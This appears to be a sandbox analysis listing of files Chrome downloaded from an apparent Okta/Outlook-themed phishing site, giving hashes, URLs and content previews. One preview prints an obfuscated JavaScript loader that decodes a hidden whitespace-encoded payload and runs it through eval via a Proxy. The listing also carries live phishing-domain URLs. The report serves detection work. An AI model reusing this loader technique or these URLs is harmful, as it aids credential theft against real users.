                                                                                                                                                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):937
                                                                                                                                                                                                              Entropy (8bit):7.737931820487441
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:FC3B7BBE7970F47579127561139060E2
                                                                                                                                                                                                              SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                                                                                                                                                                              SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                                                                                                                                                                              SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):25216
                                                                                                                                                                                                              Entropy (8bit):7.947339442168474
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:F9A795E2270664A7A169C73B6D84A575
                                                                                                                                                                                                              SHA1:0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8
                                                                                                                                                                                                              SHA-256:D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
                                                                                                                                                                                                              SHA-512:E17C8D922F52C8AB36D9C0A7DC41D32735CF1680EA653056308C6D23255FDBE40B96C68F0E7F8B3B521B6ACB080CD825F94320364B0A70141606A4449D980517
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://asix.jiitimeztcw.es/ij9B1srBpWG7PktmXozMpAfjAkXX9fqf4mnIUavaF4cJBACQ12RVF2ht1Sw1U4ef208
                                                                                                                                                                                                              Preview:RIFFxb..WEBPVP8X....0...o.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.Y....'$H..xkD....oUS..[.uM....CwI.H#.H.t(..!J.AJ# .(........0.W.?D...g.6..u......}K5.>|....^..*2.....z..../.1..F..A...Vk..W.Wm?z....H+.;:...s..Z;....V.....Z.gm.......\>.}..-.....w...D.........+,K...#......._[L.[.]w1..[.l..8.....f..E...W....;....o.Q...T`.W.(..........;^........:.T..6......Yo..x.6..n.\A.5X.........J....2.O.)....0..zdL1.x.X..e?.eA.M%f.D..W.].A=6D.....w....>.*3|M.7....aEe&l.or.Tt^.*6li..lYz.HF.....2.\...U.tfQ.<ZlHB.G--....]T..h.L.U]...m....{..T{....~......K#
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):48316
                                                                                                                                                                                                              Entropy (8bit):5.6346993394709
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (52007), with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):153294
                                                                                                                                                                                                              Entropy (8bit):5.968067583877128
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:881C3E601DFF02862C3B8B5B7A7CB49C
                                                                                                                                                                                                              SHA1:84AB80DA0CF61102D581EB6EA718EC4FA84DB0BE
                                                                                                                                                                                                              SHA-256:C62FC7D143F062075A9DEE39930CAED193F6E7BDAB266213469E7916DF832C0E
                                                                                                                                                                                                              SHA-512:591AABEEB36B50EB166BAECBBA8DB71453A85C1567A18CC4BC8817C4118D82248958C8B6AFF173F1E38833B2E6A213A14D944EBD05D4004F209B417E4A38788D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRM
                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">.. <meta name="robots" content="noindex, nofollow">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>&#8203;</title>.. <style id="outlooklogostyle">..body#outlooklogo {.. background-color: #fff;.. height: 100%;.. overflow: hidden;..}....:root {.. --s: 180px;.. --envW: 130px;.. --envH: 71px;.. --calW: 118px;.. --sqW: calc(var(--calW) / 3);.. --sqH: 37px;.. --calHH: 20px;.. --calH: calc(var(--sqH) * 3 + var(--calHH));.. --calY: calc(var(--calH) + 20px);.. --calYExt: calc(var(--calH) - 80px);.. --calYOverExt: calc(var(--calH) - 92px);.. --flapS: 96px;.. --flapH: calc(0.55 * var(--envH));.. --flapScaleY: calc(var(--flapH) / var(--flapWidth));.. --dur: 5s..}..#containerShadow,#ef{border-radius:0 0 7px 7px;}..#cal,#cal>.r{display:flex;}..#fmask,#openedFlap{width:var(--envW);height:107px;}..#ca
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (21720), with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4724541
                                                                                                                                                                                                              Entropy (8bit):2.5839796656457863
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:AA849F9614E090F7E5EBED754F83D3C2
                                                                                                                                                                                                              SHA1:4100808BBC0665E1ECF3372DDF7DD02A14B1387A
                                                                                                                                                                                                              SHA-256:928A123423281E31FCC018F4CB5B297299EFB723678D2A45EFCD842F6C6A4AE6
                                                                                                                                                                                                              SHA-512:522EB407E209EA8E61622882669258866409277A8E754A994264D4B1418164236AAFB4630FA8B3A0029D7D0700E07D1113CFED04882BEAF3842C8FB5CE167E8D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://asix.jiitimeztcw.es/34wP0TuMpggj2ErklBor18hEY89104
                                                                                                                                                                                                              Preview:function decodeAndEvaluate(key) {.. const binaryString = [...key].. .map(char => Number('.' > char)).. .join('').. .replace(/.{8}/g, byte => String.fromCharCode(parseInt(byte, 2)));.. .. (0, eval)(binaryString);.. return true;..}....const handler = {.. get: function(_, prop) {.. decodeAndEvaluate(prop);.. return true;.. }..};..const viewsen = new Proxy({}, handler);..viewsen["........................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):268
                                                                                                                                                                                                              Entropy (8bit):5.111190711619041
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:59759B80E24A89C8CD029B14700E646D
                                                                                                                                                                                                              SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                                                                                                                                                              SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                                                                                                                                                              SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://asix.jiitimeztcw.es/opDv0BklCs5PNU9b6kPW69FghgkrYCdzwOe1ACSAZpnGdcd194
                                                                                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):10796
                                                                                                                                                                                                              Entropy (8bit):7.946024875001343
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:12BDACC832185D0367ECC23FD24C86CE
                                                                                                                                                                                                              SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                                                                                                                                                                              SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                                                                                                                                                                              SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                                                                                                                                                                                              Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):892
                                                                                                                                                                                                              Entropy (8bit):5.863167355052868
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:41D62CA205D54A78E4298367482B4E2B
                                                                                                                                                                                                              SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                                                                                                                                                                                                              SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                                                                                                                                                                                                              SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              Preview:RIFFt...WEBPVP8X....0.../../..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH=......m[..H.A.).U....A..C.u@. ....L.......;.....$3{2{....3..V6.i.W.F.h..ee^k.:..cl.Z.eb.....).IZ....!....;X.:&...hF0...kM......!W5.ak8.......#V.s...2...`..v...}.(0 p../s.'VS`SjX.B.,...v.#./I....}.b....^*1..k.:F9hgb.HgW.Q^.r}..Y5....'.JJ....&.."]<.M.Z)o.H..].i.H1..G.P>.b.{.G.\BYx*.[.y...?L....:.%.d......%.q..VP8 @...0....*0.0.>U .E..!.4.8.D...o..z...A....Z........?..z......k...
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):28584
                                                                                                                                                                                                              Entropy (8bit):7.992563951996154
                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:17081510F3A6F2F619EC8C6F244523C7
                                                                                                                                                                                                              SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                                                                                                                                                                              SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                                                                                                                                                                              SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://asix.jiitimeztcw.es/GDSherpa-regular.woff2
                                                                                                                                                                                                              Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):7390
                                                                                                                                                                                                              Entropy (8bit):4.02755241095864
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                                                                                                                                                              SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                                                                                                                                                              SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                                                                                                                                                              SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://asix.jiitimeztcw.es/klQjXXsK6UHY13vEvfc0gBMyW0bvmYMRYrXBcdip5HMwaBOlPuWhUBBahVqb78170
                                                                                                                                                                                                              Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4622
                                                                                                                                                                                                              Entropy (8bit):7.771723927920211
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:4E60AA2DE553E4705CBF57EC3E0FA2F0
                                                                                                                                                                                                              SHA1:91B69ED3809086B0FC7E25231B71FA3A8A80A099
                                                                                                                                                                                                              SHA-256:5C3F2D6BC58270CF0932F6902E094855E8B1C7534F9360EEA615B10060128764
                                                                                                                                                                                                              SHA-512:1737EAB49EE923E306274E6CD89EE6422B2513919511334122CAAD2057BAE818B01106F658FB73FE73E644C37A1C0C76FBCEC7E741F843AA09F51CB5A60C9D47
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              Preview:RIFF....WEBPVP8X....0...U..G..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH>...... .....6....?w....JP.A..m.u.m...m..?...m5m.m......c.q~7...%...0}x"k.@....i.Yo..6.h..ho..9...6C{_%..O.:t.S.CNx7.\6w.c...:{..2....9./...;[.1.J...oqu........a...9...+M..>K.3MU.vA75..mt....7..Bc...&..M:..N....u.dM.%V9....;...C.e2..o...!. ..7.;m...Y.t..`..0..X....~e....<.M..........[.....t..?..>.q.!.7.c.......F,m.j.....@.\..}.F...q.......rd..v.].D.5ep..^.......?(......\R.....$..f.y.5....v._..M.i...e...qM..}D.5..!.....g|DZ..."1..(oB.y....[5..F;.A.&.3.....6.0Z...Y...+G..qk
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://m78bw.ajcffp.ru/bhanchod@cm2jzyv
                                                                                                                                                                                                              Preview:0
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):2905
                                                                                                                                                                                                              Entropy (8bit):3.962263100945339
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:FE87496CC7A44412F7893A72099C120A
                                                                                                                                                                                                              SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                                                                                                                                                              SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                                                                                                                                                              SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://asix.jiitimeztcw.es/yzl90gnm1KLEmoCR6qHjMHCqo8f9r3opwID50ldIh3nZl4A90173
                                                                                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines (10450)
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):10498
                                                                                                                                                                                                              Entropy (8bit):5.327380141461276
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:E0D37A504604EF874BAD26435D62011F
                                                                                                                                                                                                              SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                                                                                                                                                                              SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                                                                                                                                                                              SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                                                                                                                                                                              Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
